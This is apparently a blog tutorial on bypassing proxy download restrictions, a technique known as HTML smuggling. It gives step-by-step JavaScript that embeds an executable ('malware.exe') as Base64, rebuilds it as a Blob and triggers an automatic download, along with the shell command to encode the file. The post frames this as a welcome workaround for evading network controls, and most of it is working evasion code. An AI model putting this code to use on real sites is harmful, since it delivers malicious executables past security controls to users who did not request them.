Bypass Download Restriction with JavaScript Blob
In this blog post, we're going to bypass download restriction with JavaScript Blob.
Sometimes proxies might disallow downloading executable files. When you send a HTTP GET request to /malware.exe, the proxy catches and drops the request. Fortunately there's been a work around since HTML5.

Steps to Bypass The Restriction
Convert the executable file to Base64.
Copy the Base64 string and assign it to a JavaScript variable.
Write a function which converts Base64 to binary.
Convert the Base64 string with the function.
Create a "octet/stream" type blob.
Create an object URL.
Create a link (a). (This step can be omitted if you already have a link tag.)
Edit href and download attributes of the link.
Click the link automatically.
To clean up, revoke the URL you created.
What is Blob?
The Blob object represents a blob, which is a file-like object of immutable, raw data; they can be read as text or binary data, or converted into a ReadableStream so its methods can be used for processing the data.
Step #1 - Convert The Executable File
If you have access to Bash, you can use base64 command to convert an executable file to Base64 string.
base64 -w0 malware.exe
Step #2, 3, 4
window.atob => Converts ASCII to binary.
charCodeAt => Returns UTF-16 code of the giving character.
var base64toArrayBuffer = (b64) => {
let binaryStr = window.atob(b64);
let lenOfBinaryStr = binaryStr.length;
let bytes = new Uint8Array(lenOfBinaryStr);
for(let i = 0; i < lenOfBinaryStr; i++)
bytes[i] = binaryStr.charCodeAt(i);
return bytes;
}
var b64 = "aGVsbG8gd29ybGQK...";
var bytes = base64toArrayBuffer(b64);
Step #5 - Create a Blob
-- snippet --
var bytes = base64toArrayBuffer(b64);
var blob = new Blob([bytes], {type: "octet/stream"});
Step #6 - Create an Object URL
-- snippet --
var blob = new Blob([bytes], {type: "octet/stream"});
var fileName = 'malware.exe';
var url = window.URL.createObjectURL(blob);
Step #7, 8 - Create a Link
-- snippet --
var link = document.createElement("a");
link.href = window.URL.createObjectURL(blob);
link.download = fileName;
document.body.appendChild(link);
If you check out the DOM. You can examine the created link.

Step #9, 10
-- snippet --
var link = document.createElement("a");
link.href = window.URL.createObjectURL(blob);
link.download = fileName;
document.body.appendChild(link);
link.click()
window.URL.revokeObjectURL(url);
Links
Last updated
Was this helpful?